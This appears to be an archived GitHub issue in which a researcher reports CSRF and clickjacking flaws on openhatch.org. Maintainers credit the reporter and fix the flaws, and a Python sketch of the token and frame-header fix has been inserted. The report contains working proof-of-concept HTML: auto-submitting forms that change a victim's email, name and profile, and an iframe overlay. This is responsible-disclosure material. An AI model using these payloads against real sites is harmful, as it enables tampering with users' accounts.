openhatch / oh-mainline

The code that runs openhatch.org
http://openhatch.org
GNU Affero General Public License v3.0

CSRF and clickjacking vulnerability at openhatch.org #1232

Closed imported-from-roundup closed 10 years ago

imported-from-roundup commented 10 years ago

Comment by pik4chu:

Hey guys, I found a vulnerability at your site: a Cross-Site Request Forgery (CSRF) and clickjacking vulnerability.

Description: Cross-site request forgery, also known as a one-click attack or session riding and abbreviated as CSRF or XSRF, is a type of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website trusts.

Impact: The impact of this can be anything from creating new data--which may be an outright defacement, contain disinformation or direct users to another malicious website--to deleting or altering existing data.

<html>
  <body onload="document.forms[0].submit()">
    <form action="http://openhatch.org/account/settings/contact-info/do" method="POST">
      <input type="hidden" name="edit_email-email" value="jeroldcamacho.res@gmail.com" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>

<html>
  <body onload="document.forms[0].submit()">
    <form action="http://openhatch.org/account/settings/edit_name_do" method="POST">
      <input type="hidden" name="first_name" value="CSRF" />
      <input type="hidden" name="last_name" value="CSRF" />
      <input type="hidden" name="username" value="CSRF" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>

<html>
  <body onload="document.forms[0].submit()">
    <form action="http://openhatch.org/people/info/edit/do" method="POST">
      <input type="hidden" name="edit-tags-bio" value="Cross-site Request Forgery" />
      <input type="hidden" name="edit-tags-homepage_url" value="" />
      <input type="hidden" name="edit-tags-irc_nick" value="" />
      <input type="hidden" name="edit-tags-understands" value="" />
      <input type="hidden" name="edit-tags-understands_not" value="" />
      <input type="hidden" name="edit-tags-studying" value="" />
      <input type="hidden" name="edit-tags-can_pitch_in" value="" />
      <input type="hidden" name="edit-tags-can_mentor" value="" />
      <input type="hidden" name="edit-tags-contact_blurb" value="" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>

To fix the CSRF, you must add an auth token to every HTML form at your site :)

I FOUND A CLICKJACKING VULNERABILITY TOO

<html>
  <head>
    <style>
      iframe { width: 800px; height: 500px; position: absolute; top: 0; left: 0; filter: alpha(opacity=50); opacity: 0.5; }
    </style>
  </head>
  <body>
    <iframe src="http://openhatch.org/"></iframe>
  </body>
</html>


Comment by paulproteus:

I'm surprised we're not using Django's built-in CSRF protection already! pik4chu, thank you for reporting this!


Comment by pik4chu:

Waiting for it to be fixed... All you need is to put a CSRF token in every form :)

Hope I'll get some token of appreciation... Thanks, ma'am!



Comment by pik4chu:

https://docs.djangoproject.com/en/dev/ref/contrib/csrf/
https://docs.djangoproject.com/en/dev/ref/clickjacking/#

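As an added illustration of the two fixes the thread points at (a per-session token verified on every state-changing POST, and an X-Frame-Options header so the site cannot be overlaid in a transparent iframe), here is a framework-free Python sketch. It is not oh-mainline code or the code from the linked pull requests; Request, issue_csrf_token, csrf_ok and handle_edit_name are hypothetical names, and the cookie/field names csrftoken and csrfmiddlewaretoken mirror Django's double-submit scheme.

```python
import hmac
import secrets
from dataclasses import dataclass, field

# Hypothetical example types and handlers, constructed for this illustration;
# they are not oh-mainline code.


@dataclass
class Request:
    method: str
    path: str
    cookies: dict = field(default_factory=dict)  # sent by the browser automatically
    form: dict = field(default_factory=dict)     # contents of the submitted form


def issue_csrf_token(cookies: dict) -> str:
    """Set a random per-session token cookie (if absent) and return it so the
    server's own page can embed it as <input type="hidden" name="csrfmiddlewaretoken">."""
    if not cookies.get("csrftoken"):
        cookies["csrftoken"] = secrets.token_hex(32)
    return cookies["csrftoken"]


def csrf_ok(request: Request) -> bool:
    """Reject state-changing requests whose form token does not match the cookie.
    An attacker's cross-origin page can make the browser send the cookie but cannot
    read it, so it cannot place the matching value in its hidden input."""
    if request.method in ("GET", "HEAD", "OPTIONS", "TRACE"):
        return True  # safe methods must not change state, so no token is required
    cookie_token = request.cookies.get("csrftoken", "")
    form_token = request.form.get("csrfmiddlewaretoken", "")
    # Constant-time comparison; an empty cookie token never passes.
    return bool(cookie_token) and hmac.compare_digest(cookie_token, form_token)


def handle_edit_name(request: Request):
    """Models the edit_name_do endpoint from the report. Returns (status, headers, body)."""
    # X-Frame-Options: DENY stops the page being framed, which defeats the
    # half-transparent iframe overlay from the clickjacking proof of concept.
    headers = {"X-Frame-Options": "DENY"}
    if not csrf_ok(request):
        return 403, headers, "CSRF verification failed"
    first = request.form.get("first_name", "")
    return 200, headers, f"name updated to {first}"
```

The forged request below carries the victim's cookie (the browser attaches it) but no token field, which is exactly the shape of the posted proof-of-concept forms, so it is refused.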


Comment by pik4chu:

Hello ma'am Britta, any reply regarding this issue?



Comment by paulproteus:

No update yet, we've been very busy, but I hope we'll get to this soon! We're concerned about the impact this can have on users of the site.


Comment by pik4chu:

Ma'am Asheesh? Will you give a small token of appreciation?



Comment by brittag:

Hi Jerold, you're listed on the "thanks" page now: http://openhatch.readthedocs.org/en/latest/community/thanks.html


Comment by pik4chu:

Even some swag or stickers, ma'am?



Comment by brittag:

Yes, we can put you on the list for stickers! I'll ask you for an address over email later, when we're closer to figuring out logistics for sending stickers. :)


Comment by pik4chu:

How many stickers, sir?



Comment by pik4chu:

I mean ma'am!



Comment by bugZPDX:

Submitted pull requests. https://github.com/openhatch/oh-mainline/pull/243


Comment by pik4chu:

Nice, sir. But how's my gift (the stickers)?



Comment by bugZPDX:

Resubmitted pull request after cleanup suggestions: https://github.com/openhatch/oh-mainline/pull/247


Comment by bugZPDX:

Resolved with PR #247: https://github.com/openhatch/oh-mainline/pull/247


Comment by pik4chu:

Hi??? How's the sticker?



Comment by ehashman:

As this bug appears to be resolved, and as I am told the stickers are in the mail, I am reducing the priority.

I am also changing the status to 'needs-review', blocking on your receipt of the stickers. Please set this to 'resolved' when they arrive.


Files attached by pik4chu:
- http://roundup-archive.openhatch.org/bugs/file642/unnamed
- http://roundup-archive.openhatch.org/bugs/file643/unnamed
- http://roundup-archive.openhatch.org/bugs/file646/unnamed
- http://roundup-archive.openhatch.org/bugs/file647/unnamed
- http://roundup-archive.openhatch.org/bugs/file648/unnamed
- http://roundup-archive.openhatch.org/bugs/file649/unnamed
- http://roundup-archive.openhatch.org/bugs/file650/unnamed
- http://roundup-archive.openhatch.org/bugs/file673/unnamed
- http://roundup-archive.openhatch.org/bugs/file680/unnamed

Status: need-review
Nosy List: brittag, bugZPDX, paulproteus, pik4chu
Priority: wish
Imported from roundup ID: 917
Last modified: 2014-06-26.04:35:26

ehashman commented 10 years ago

I am going to close this now, as we've migrated our issues so pik4chu may not be able to.